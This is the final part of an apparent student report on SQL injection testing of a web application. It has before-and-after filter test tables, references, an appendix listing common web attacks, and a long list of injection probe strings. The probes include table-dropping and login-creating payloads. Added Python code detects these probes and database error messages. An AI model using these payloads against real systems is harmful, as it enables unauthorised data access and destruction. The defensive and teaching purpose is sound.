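The coercion column explains the observations in this chapter (a quote or a 1=2 condition after a numeric id is simply dropped), while the filter column shows the section 7.5 behaviour of answering such requests with the error page instead.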
Figure 38 Buy Cut Save Application Category Form page
The page in Figure 38 is the web page from the BCS web application that we tested with SQL injection attacks. This page showed an error when we passed any quotes or malicious code, as we already tested previously. This page was vulnerable before I implemented the functions to filter the user input. Now, if attackers pass any quote to check whether this page is vulnerable to SQL injection or not, the page loads normally. We can see this in the snapshot below: I tried to pass a quote in the link below after implementing user input filters.
Figure 39 Buy Cut Save Application Category Form Page
The quote turns into %27 and the page loads normally, as we can see in Figure 39. That means the page is not giving the user any error or any information after malicious code is passed in the URL that would indicate this page is vulnerable. So now this web page is secure when attackers pass any script or malicious code in the URL to hack the whole back end.
I passed all the queries and malicious codes that we used before to hack the BCS web application. After implementing user input filters in the code, it won't allow attackers to pass any script or any injectable query to hack that web application. Below is the table which represents the result of each query I tested after implementing user input filters.
Web site: BCS web application
Page Name: Category Management
File Name: Category Form

Injection in MySQL by using URL method attack | Result before implementing input filters | Result after implementing input filters
Passing the quotes in to the URL | PASS | FAIL
Enumerating column length | PASS | FAIL
Finding NULL column | PASS | FAIL
Finding version of the database | PASS | FAIL
Fetching user name from database | PASS | FAIL
Fetching column name from database | PASS | FAIL

NOTE: PASS: The web page is vulnerable. FAIL: The web page is not vulnerable.
7.7 Secure the Blind SQL Injection:
As we hacked the BCS web application by using the Blind SQL injection technique, passing the malicious queries we made to hack that application and dumping the whole database, I tested the same queries again on the same web pages after implementing filters to prevent user input attacks. Below is the testing result for the Blind SQL injection attack after implementing user input filters.
When a web page is vulnerable to blind SQL injection and you pass a false condition after the URL and load the page, it replies with some text, picture or other content missing from the web page, as we tested. We can see in Figure 40 what happened when I tested the blind SQL injection attack after implementing user input filters.
I passed the false condition 1=2 in the URL, but the page loaded normally, which means this page is not vulnerable to the Blind SQL injection attack. We can see this in the snapshot below.
Figure 40 Buy Cut Save Application Category Form Page
Moreover, I tested all the pages of the BCS web application that were vulnerable before implementing user input filters. Below is the table which represents the result of testing the Blind SQL injection attack before and after implementing user input filters in the code.
Web site: BCS web application
Page Name: Category Management
File Name: Category_Form

Blind SQL Injection Attack | Result before implementing input filters | Result after implementing input filters
Vulnerability checking | PASS | FAIL
Getting version in MySQL database | PASS | FAIL
Enumerating table name from the current database | PASS | FAIL
Enumerating column name | PASS | FAIL

NOTE: PASS: The web page is vulnerable. FAIL: The web page is not vulnerable.
VIII. Conclusion
This report first describes the unique characteristics of web application development and then illustrates three types of testing for vulnerabilities and attacks. We discussed how the security testing methodologies work, and at the end we applied those techniques to secure our BCS web application from SQLI attacks.
Web applications have been evolving extraordinarily fast with new programming models and technologies. The most widely applied security testing methodologies today are extensive and are sometimes too complicated, with their many activities and phases. When such broad security testing methodologies are applied in the realm of web applications, developers tend to neglect the testing process because the methodologies are considered time-consuming, lacking a significant payoff and inappropriate for web applications, which have a very short time-to-market.
This results in an ever-changing landscape for web application security with new challenges, which requires substantial and sustained effort from security researchers. Security attacks are always emerging, which requires security professionals to provide effective security solutions to protect web applications from the various web application attacks.
IX. References:
Antunes, N., Vieira, M.: Detecting SQL Injection Vulnerabilities in Web Services. Dependable Computing, Latin-American Symposium on 0 (2009) 17-24.
Antunes, N. & Vieira, M. 2014, "Penetration Testing for Web Services", Computer, vol. 47, no. 2, pp. 30-36.
Atefeh Tajpour, Suhaimi Ibrahim & Mohammad Sharifi 2012, "Web Application Security by SQL Injection Detection Tools", International Journal of Computer Science Issues (IJCSI), vol. 9, no. 2, pp. 332-339.
Antunes, N., Laranjeiro, N., Vieira, M., Madeira, H.: Effective Detection of SQL/XPath Injection Vulnerabilities in Web Services. In: Proceedings of the 2009 IEEE International Conference on Services Computing. SCC'09, Washington, DC, USA, IEEE Computer Society (2009) 260-267.
Abdul Razzaq, Ali Hur, H Farooq Ahmad & Muddassar Masood 2012, "Semantic Architecture for Web application Security", International Journal of Computer Science Issues, vol. 9, no. 2, pp. 435-441.
Anonymous 2010, "Google steps up security of web applications", COMTEX News Network, Inc, Woodside.
Asd.gov.au, (2015). Protecting Web Applications and Users: ASD Australian Signals Directorate. [online] Available at: http://www.asd.gov.au/publications/protect/protecting_web_apps.htm#frame [Accessed 17 May 2015].
Bau, J., Bursztein, E., Gupta, D., Mitchell, J.: State of the Art: Automated Black-Box Web Application Vulnerability Testing. In: Proceedings of the 2010 IEEE Symposium on Security and Privacy. SP '10, Washington, DC, USA, IEEE Computer Society (2010) 332-345.
Barnett, R.C. & Barnett, J. 2012, "Web Application Defender's Cookbook: Battling Hackers and Protecting Users", John Wiley & Sons.
Ben Rothke 2003, Web Hacking: Attacks and Defense / Hacking Exposed Web Applications: Web Application Security Secrets and Solutions, ASIS International, Arlington.
Bayles, A.W. & Books24x7, I. 2007, Penetration tester's open source toolkit, Syngress, Burlington, MA.
Ben-Natan, R. 2005, Implementing Database Security and Auditing (5th Edition), Digital Press, Burlington.
Burnett, M. & Books24x7, I. 2004, Hacking the Code: ASP.NET Web Application Security, Syngress Publishing, Rockland, Mass.
Bavani, R. 2012, "Distributed Agile, Agile Testing, and Technical Debt", IEEE Software, vol. 29, no. 6, pp. 28-33.
Chris Anley. Advanced SQL Injection in SQL Server Applications. An NGSSoftware
Cross, M. & Books24x7, I. 2007, Web application vulnerabilities: detect, exploit, prevent, Syngress Pub, Burlington, MA.
Cross, M., Books24x7, I. & ebrary, I. 2007, Developer's guide to web application security, Syngress, Rockland, MA.
Curphey, M., & Arawo, R. 2006, "Web application security assessment tools", IEEE Security & Privacy Magazine, vol. 4, no. 4, pp. 32-41.
Dorrans, B. 2010, "Beginning ASP.NET Security", Wrox.
Doupé, A., Cova, M., Vigna, G.: Why Johnny can't pentest: an analysis of black-box web vulnerability scanners. In: Proceedings of the 7th international conference on Detection of intrusions and malware, and vulnerability assessment. DIMVA'10, Berlin, Heidelberg, Springer-Verlag (2010) 111-131.
Dpc.sa.gov.au, (2015). Policies, Standards and Guidelines. [online] Available at: http://dpc.sa.gov.au/policies-standards-and-guidelines [Accessed 10 April 2015].
Dharam, R. & G. Shiva, S. 2014, "Runtime Monitoring Framework for SQL Injection Attacks", International Journal of Engineering and Technology, vol. 6, no. 5, pp. 392-401.
Desme, L. and Johns, M. (n.d.). Web application security. [online] Available at: http://research.microsoft.com/enus/um/people/livshits/papers%5Ctr%5Cdagrep_s12401.pdf [Accessed 14 May 2015].
DuPaul, N. (2015). SQL Injection Tutorial: Learn About Injection Attacks, Vulnerabilities and How to Prevent SQL Injections. [online] Veracode. Available at: http://www.veracode.com/security/sql-injection [Accessed 14 May 2015].
Ellen Messmer 2008, "Dealing with SQL injection attacks", Network World, [Online], vol. 25, no. 18, pp. 14.
Easttom, C. 2012, Computer security fundamentals, Pearson Certification, Indianapolis, Ind.
Erdogan, G. (2009). Security Testing of Web Based Applications. [online] Available at: http://www.diva-portal.org/smash/get/diva2:348920/FULLTEXT01.pdf [Accessed 14 May 2015].
Fong, E., Gaucher, R., Okun, V., Black, P.E., Dalci, E.: Building a Test Suite for Web Application Scanners. In: Proceedings of the 41st Annual Hawaii International Conference on System Sciences. HICSS '08, Washington, DC, USA, IEEE Computer Society (2008) 478.
Fonseca, J., Vieira, M., Madeira, H.: Testing and Comparing Web Vulnerability
Fahad Alanazi & Mohamed Sarrab 2011, "The History of Web Application Security Risks", International Journal of Computer Science and Information Security, vol. 9, no. 6, pp. 40-47.
Gavin Bierman, Erik Meijer, and Wolfram Schulte. The Essence of Data Access in Cω. In The 19th European Conference on Object-Oriented Programming (ECOOP), pages 287–311, 2005.
Ghani, I., Azham, Z. & Jeong, S.R. 2014, "Integrating Software Security into Agile-Scrum method", KSII Transactions on Internet and Information Systems, vol. 8, no. 2, pp. 646
Howard, M., LeBlanc, D., Viega, J.: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them. 1 edn. McGraw-Hill, Inc., New York, NY, USA (2010)
Insight Security Research (NISR) publication, 2002. http://www.nextgenss.com/papers/advanced_sql_injection.pdf
Laskos, A.: Arachni - Web Application Vulnerability Scanning Framework (2011) https://github.com/Zapotek/arachni.
In.mathworks.com, (2015). Improving Software Quality with Static Code Analysis. [online] Available at: http://in.mathworks.com/company/newsletters/articles/improving-softwarequality-with-static-code-analysis.html [Accessed 17 May 2015].
Kumar, M. and Indu, L. (2015). Detection and Prevention of SQL Injection attack. [online] (09759646). Available at: http://www.ijcsit.com/docs/Volume%205/vol5issue01/ijcsit2014050178.pdf [Accessed 14 May 2015].
Li, X. and Xue, Y. (2015). A Survey on Server-side Approaches to Securing Web Applications. [online] Available at: https://www.truststc.org/pubs/910/Survey-Final.pdf [Accessed 14 May 2015].
Mcallister, S., Kirda, E., Kruegel, C.: Leveraging User Interactions for In-Depth Testing of Web Applications. In: Proceedings of the 11th international symposium on Recent Advances in Intrusion Detection. RAID '08, Berlin, Heidelberg, Springer-Verlag (2008) 191-210.
Manuel Costa, Miguel Castro, Lidong Zhou, Lintao Zhang, and Marcus Peinado. Bouncer: Securing Software by Blocking Bad Input. In Proceedings of the 21st ACM Symposium on Operating Systems Principles 2007 (SOSP 2007), pages 117–130, 2007.
Mehta, D. (n.d.). Effective Software Security Management. [online] Mumbai. Available at: https://www.owasp.org/images/2/28/Effective_Software_Security_Management.pdf [Accessed 17 May 2015].
Meier, J.D. & Meier, J.D. 2006, "Web application security engineering", IEEE Security & Privacy Magazine, vol. 4, no. 4, pp. 16-24.
Michael Cross 2007, Web application vulnerabilities: detect, exploit, prevent, Syngress Media Incorporated, GB.
McClure, R. & Krüger, I. 2005, "SQL DOM: compile time checking of dynamic SQL statements", ACM, pp. 88.
Morgan, D. 2006, Web application security – SQL injection attacks, Elsevier B.V, Kidlington.
Nahari, H., Krutz, R.L. & Books24x7, I. 2011, Web Commerce Security: Design and Development, Wiley, Hoboken.
Oehlert, P.: Violating Assumptions with Fuzzing. IEEE Security and Privacy 3 (2005) 58-62.
Owasp.org, (2015). OWASP. [online] Available at: https://www.owasp.org/index.php/Main_Page [Accessed 19 April 2015].
Palmer, S.: Web Application Vulnerabilities: Detect, Exploit, Prevent. Syngress Publishing (2007)
P Naresh Kumar, N Soujanya, G Yugandhar & K Nageswara Rao 2011, "The Image Level Tainting: A New Approach for Preventing SQL Injection Attacks", International Journal of Engineering Science and Technology, vol. 3, no. 7, pp. 5622-5628.
Pinto, M. & Stuttard, D. 2008, "Web Application Hackers Handbook: Discovering and Exploiting Security Flaws", John Wiley & Sons.
Ping-Chen, X. 2011, "SQL injection attack and guard technical research", Procedia Engineering, vol. 15, pp. 4131-4135.
Ringgold Inc, Portland, Hacking web apps; detecting and preventing web application security problems, 2012.
Ringgold Inc, Portland, SQL injection attacks and defense, 2d ed, 2013.
Roy, S., Singh, A. and Sairam, A. (2012). Novel Approach to Prevent SQL Injection Attack Using URL Filter. [online] Available at: http://ijimt.org/papers/284-E20062.pdf [Accessed 14 May 2015].
Sutton, M., Greene, A., Amini, P.: Fuzzing: Brute Force Vulnerability Discovery. Addison-Wesley Professional (2007)
Shelly, D.A.: Using a Web Server Test Bed to Analyze the Limitations of Web Application Vulnerability Scanners. Master's thesis, Virginia Polytechnic Institute and State University, Blacksburg, Virginia (July 2010).
S. Mirdula & D. Manivannan 2013, "Security Vulnerabilities in Web Application - An Attack Perspective", International Journal of Engineering and Technology, vol. 5, no. 2, pp. 1806-1811.
Sandra Sarasan 2013, "Detection and Prevention of Web Application Security Attacks", International Journal of Advanced Electrical and Electronics Engineering, vol. 2, no. 3, pp. 29-34.
SANS Institute, (2007). Software Engineering - Security as a Process in the SDLC. [online] Available at: http://www.sans.org/reading-room/whitepapers/securecode/softwareengineering-security-process-sdlc-1846 [Accessed 17 May 2015].
Scanning Tools for SQL Injection and XSS Attacks. Pacific Rim International Symposium on Dependable Computing, IEEE 0 (2007) 365-372.
Shar, L.K. & Tan, H.B.K. 2013, "Defeating SQL Injection", Computer, vol. 46, no. 3, pp. 69-77.
Simpson, M.T., Backman, K. & Corley, J.E. 2012, Hands-On Ethical Hacking and Network Defense, Course Technology / Cengage Learning.
Vieira, M., Antunes, N., Madeira, H.: Using Web Security Scanners to Detect Vulnerabilities in Web Services. 2009 IEEE/IFIP International Conference on Dependable Systems & Networks (2009) 566-571.
Zhao, G., Zheng, W., Zhao, J., Chen, H.: An Heuristic Method for Web-Service Program Security Testing. ChinaGrid, Annual Conference 0 (2009) 139-144.
X. Appendices
10.1 Appendix- A
Top 10 Attacks in web application discovered by Howard, Leblanc & Viega

Top 10 Attacks and their description:

1. Injection Methods: These flaws occur when untrusted data is passed to trick the interpreter as a query in order to execute a command or a query, which can help the attacker gain access to data without any proper authorization.

2. Broken Authentication and Session Management: Application functionalities fail to address the core areas of authentication and session management, allowing attackers to break in and compromise session cookies, tokens, passwords or any keys in order to exploit the application and steal identities.

3. Cross-Site Scripting (XSS): These are specially crafted scripts which are accepted by flawed applications and sent as untrusted data through the web browser without proper validation. XSS helps attackers execute scripts in the victim's web browser, which has the capacity to hijack the victim's sessions, deface websites or redirect the victim to malicious sites.

4. Insecure Direct Object References: These are instances where developers expose a reference to an internal implementation object, which can be a file, a directory or even a database key. This happens if there are no proper access controls or other means of protection. These flaws allow attackers to manipulate references in order to access unauthorized data.

5. Security Misconfiguration: Security can only be achieved with proper security practices, which include defining and deploying applications with robust security configurations, and likewise for frameworks, the servers on which the applications are going to be installed, and the associated web servers and database servers. As default settings tend to be insecure, proper security settings are to be defined, implemented, maintained and, above all, kept updated.

6. Sensitive Data Exposure: Most present-day web apps handle corporate/private/personnel data which is considered sensitive and might not have proper security controls enforced. This allows attackers to steal the data for identity theft and credit card fraud, to name a few.

7. Missing Function Level Access Control: Web applications undergo functionality tests right before a full-fledged functional user interface is built; on the other hand, there is also a need to perform access control checks on the server while the functions are being accessed. If the requests are not thoroughly verified, attackers will have a chance to break in with forged requests in order to access the functionality, compromising the authorization.

8. Cross-Site Request Forgery (CSRF): A CSRF attack forces a logged-in victim to execute unwanted actions, such as sending forged HTTP requests, which include the victim's session-related information like session cookies and any other authentication information, to a vulnerable web application. Attackers can force the victim's web browser to create requests that trick the vulnerable application into treating them as legitimate requests from the end user.

9. Using Components with Existing Vulnerabilities: Usage of external libraries, frameworks or any software module in application development can enhance functionality and features, but also increases the chance of becoming vulnerable. When a vulnerable component gets exploited, it can aid attackers with data theft or application takeover. Building an application from vulnerable components exposes it to a wide range of attacks with associated business impact.

10. Malicious Redirects and Forwards: Present-day web applications are subject to URL redirects while determining the destination web pages. With no proper validation in place, attackers redirect users to their phishing sites or use web page forwarding for unauthorised access to authorized pages.
10.2 Appendix- B
Testing for SQL Injection Weakness (Mirdula & Manivannan, 2013)
' (single quote)
1' or '1'='1
1') or ('1'=1
Value' or '1'='2
Value') or ('1'='2
1' and '1'='2
1') and ('1'='2
1' or 'ab'='a'+'b
1') or ('ab'='a'+'b
1' or 'ab'='a''b
1') or ('ab'='a''b
1' or 'ab'='a'||'b
1') or ('ab'='a'||'b
';[SQL query];--
');[SQL query];--
';[SQL query];#
');[SQL query];#
;[SQL query];--
);[SQL query];--
;[SQL query];#
);[SQL query];#
1+1
3-1
Value+0
1 or 1=1
1) or (1=1
Value or 1=2
Value) or (1=2
1 and 1=2
1) and (1=2
1 or 'ab'='a'+'b'
1) or ('ab'='a'+'b'
1 or 'ab'='a''b'
1) or ('ab'='a''b'
1 or 'ab'='a'||'b'
1) or ('ab'='a'||'b'
Admin'--
Admin')--
Admin'#
Admin')#
1--
1)--
1 or 1=1--
1) or 1=1--
' or '1'='1'--
')or '1'='1'--
-1 and 1=2--
-1) and 1=2--
' and '1'='2'--
') and '1'='2--
1/*...*/
||6
or 1=1--
'||'6
" or "a"="a
(||6)
Admin' OR '
' OR 1=1--
' having 1 = 1--
OR 1=1
' OR 'text' = N'text'
' OR '1'='1
' OR 2 > 1
; OR '1'='1'
' OR 'text' > 't'
%27+--+
' union select
" or 1=1--
Password: */=1--
' or 1=1 /*
' or 1/*
'/**/OR/**/1/**/=/** /1
UNI/**/ON SELECT
' or 1 in (select @@version)--
';EXEC ('SEL' + 'ECT US' +'ER')
' union all select @@version
+or+isnull%281%2F0%29+%2F*
' OR 'unusual' = 'unusual'
' and 1 in (select var from temp)--
' OR 'something' = 'some'+'thing'
'; drop table temp--
' OR 'something' like 'some%'
Exec sp_addlogin 'name','password'
' OR 'whatever' in ('whatever')
@var select @var as var into temp end--
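A defender's use of the list above is to recognise these probe shapes in request logs. The following scanner is an added example, not code from the thesis or from Mirdula & Manivannan: it distils the list into a few heuristic rules (quote and boolean tautologies, comment terminators, comment-split keywords, stacked queries) and runs them over constructed access-log lines; the log lines, parameter names and function names are assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Detection rules distilled from the Appendix B probe list (Mirdula & Manivannan,
# 2013): boolean tautologies, comment terminators (--, #, /*), comment-split
# keywords such as UNI/**/ON and stacked queries. Values are matched after URL
# decoding (the list includes %27, %2F*); tune the heuristics for real inputs.
INLINE_COMMENT = re.compile(r"/\*.*?\*/")
RULES = [
    ("tautology", re.compile(r"""\b(or|and)\b\s*\(?\s*['"]?\w+['"]?\s*(=|>|<|like\b|in\b)""", re.I)),
    ("comment-terminator", re.compile(r"(--|#|/\*)\s*$")),
    ("stacked-query", re.compile(r";\s*(exec|drop|select|insert|update|delete|alter)\b", re.I)),
]
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)

def classify_probe(value: str) -> List[str]:
    """Return the sorted rule names that one decoded parameter value triggers."""
    spaced = INLINE_COMMENT.sub(" ", value)  # '/**/OR/**/1' -> ' OR 1'
    joined = INLINE_COMMENT.sub("", value)   # 'UNI/**/ON'   -> 'UNION'
    hits = [name for name, rx in RULES if rx.search(spaced)]
    if UNION_SELECT.search(joined):
        hits.append("union-select")
    return sorted(hits)

# Combined-format access log: client address, then the request line in quotes.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (client, parameter, rules) for each query parameter that looks like a probe."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, path = m.groups()
        for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            rules = classify_probe(value)
            if rules:
                findings.append((client, name, rules))
    return findings

# Constructed log lines (not real traffic; RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Apr/2015:10:00:01 +0930] "GET /product?id=42 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [19/Apr/2015:10:00:07 +0930] "GET /product?id=1%27+or+%271%27%3D%271 HTTP/1.1" 500 611',
    '198.51.100.9 - - [19/Apr/2015:10:01:15 +0930] "GET /search?q=UNI%2F%2A%2A%2FON+SELECT+%40%40version-- HTTP/1.1" 200 873',
    '198.51.100.9 - - [19/Apr/2015:10:01:20 +0930] "GET /login?user=admin%27--&pass=x HTTP/1.1" 302 0',
]
```

Running scan_log(SAMPLE_LOG) flags the second, third and fourth lines and names the rule each parameter tripped, which is the signal to correlate with the application's own error logging.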
10.3 Appendix- C
Error messages for SQL injection by Mirdula & Manivannan 2013
The table groups the error strings by the database behind the application (columns MySQL error, Access error, Oracle error and MSSQL error):

MySQL error:
"You have an error in your SQL"
"Division by zero in"
"Supplied argument is not a valid MySQL result resource in"
"Call to a member function"

Access error:
"Microsoft JET Database"
"ODBC Microsoft Access Driver"

Oracle error:
"Microsoft OLE DB Provider for SQL Server"
"Microsoft OLE DB Provider for Oracle"
"[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect"

MSSQL error:
"Microsoft OLE DB Provider for SQL Server"
"Unclosed quotation mark"
"[Microsoft][ODBC SQL Server Driver]"
"Incorrect syntax near"
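Any of these strings appearing in an HTTP response means the application is returning raw database errors to the client, which should be replaced by a generic error page with the detail logged server-side. The checker below is an added example, not code from the thesis or from Mirdula & Manivannan: it matches the signatures from the table against constructed response bodies and reports which database produced each leak; the sample responses, URLs and function names are assumptions.

```python
from typing import List, Optional, Tuple

# Database error signatures from the Appendix C table (Mirdula & Manivannan, 2013).
# The grouping follows the table's columns, except that "Microsoft OLE DB Provider
# for SQL Server", which the table lists under both Oracle and MSSQL, is kept under
# MSSQL only so that a hit is attributed to one database.
DB_ERROR_SIGNATURES = {
    "MySQL": ("You have an error in your SQL", "Division by zero in",
              "Supplied argument is not a valid MySQL result resource in",
              "Call to a member function"),
    "Access": ("Microsoft JET Database", "ODBC Microsoft Access Driver"),
    "Oracle": ("Microsoft OLE DB Provider for Oracle",
               "[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect"),
    "MSSQL": ("Microsoft OLE DB Provider for SQL Server", "Unclosed quotation mark",
              "[Microsoft][ODBC SQL Server Driver]", "Incorrect syntax near"),
}

def classify_db_error(body: str) -> Optional[Tuple[str, str]]:
    """Return (dbms, signature) for the first signature found in body, else None."""
    lowered = body.lower()  # case-insensitive match; servers vary in casing
    for dbms, signatures in DB_ERROR_SIGNATURES.items():
        for sig in signatures:
            if sig.lower() in lowered:
                return dbms, sig
    return None

def scan_responses(responses: List[Tuple[str, int, str]]) -> List[Tuple[str, str, str]]:
    """Flag (url, dbms, signature) for each (url, status, body) whose body leaks a DB error."""
    findings = []
    for url, _status, body in responses:
        hit = classify_db_error(body)
        if hit is not None:
            findings.append((url, hit[0], hit[1]))
    return findings

# Constructed sample responses (not captured traffic) to exercise the checker.
SAMPLE_RESPONSES = [
    ("/item?id=1", 200, "<html><body>Widget, price 9.99</body></html>"),
    ("/item?id=abc", 500, "Warning: mysql_fetch_array(): Supplied argument is not a "
                          "valid MySQL result resource in /var/www/item.php on line 12"),
    ("/search?q=a", 500, "Microsoft OLE DB Provider for SQL Server error '80040e14' "
                         "Unclosed quotation mark before the character string"),
]

if __name__ == "__main__":
    for url, dbms, sig in scan_responses(SAMPLE_RESPONSES):
        print(f"{url}: leaks {dbms} error ({sig!r}); return a generic error page instead")
```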
10.4 Appendix- D
Attacking factors and impacts of the SQL Injection attack by Razzaq, Hur, Farooq & Masood in 2012
Threat Agents: Application specific. Every data item that is given as input is considered to be untrusted, irrespective of the source of the data, including internal/external clients or even admins.

Attack Vectors: Easily exploitable. Hackers send specially crafted text that tricks the interpreter; such input can even come from internal sources.

Security Weaknesses (Prevalence & Detectability): Common / Moderate. Injection attacks arise when a web application passes crafted data to the interpreter. These flaws are quite common, most often cited with legacy code implementations. They are hard to discover by testing the functionality but can easily be identified with code examination, and with the scanners available today it has become easy to detect these injection flaws.

Technical Impacts: Severe. This leads to losing the data: data can be modified, stolen and can even be corrupted. These flaws ultimately have the ability to provide admin access to the attacker.

Business Impacts: Application/Business specific. All data, and the ownership of access to it, is at stake; successful exploitation puts the reputation at stake.